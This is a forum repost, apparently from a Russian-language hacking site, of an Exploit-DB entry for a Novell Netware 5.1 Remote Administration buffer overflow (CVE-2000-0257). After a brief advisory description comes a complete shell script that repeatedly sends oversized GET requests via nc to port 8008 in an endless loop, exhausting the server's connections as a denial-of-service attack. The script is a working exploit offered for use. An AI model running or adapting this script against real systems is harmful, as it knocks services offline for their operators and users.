Exploit Novell Netware 5.1 - Remote Administration Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19854
Проверка EDB
  1. Пройдено
Автор
MICHAL ZALEWSKI
Тип уязвимости
DOS
Платформа
NETWARE
CVE
cve-2000-0257
Дата публикации
2000-04-19
Novell Netware 5.1 - Remote Administration Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/1118/info


The Netware Remote Administration utility can be compromised to allow arbitrary code to be remotely run on the server.

The Remote Administration server is basically a simple webserver, and if sent a GET request of between 4 and 8 kb, some of the data gets written to executable registers.

Even without executable code being sent, this can lead to a DoS as although the server will not crash, the connection will not be aborted or cleaned. Therefore, these failed requests can be made repeatedly until the TCP/IP subsystem will no longer accept connection requests. 

#!/bin/sh

SERVER=127.0.0.1
PORT=8008
WAIT=3

DUZOA=`perl -e '{print "A"x4093}'`
MAX=30

while :; do
  ILE=0
  while [ $ILE -lt $MAX ]; do
    (
      (
        echo "GET /"
        echo $DUZOA
        echo
      ) | nc $SERVER $PORT &
      sleep $WAIT
      kill -9 $!
    ) &>/dev/null &
    ILE=$[ILE+1]
  done
  sleep $WAIT
done
 
Источник
www.exploit-db.com

Похожие темы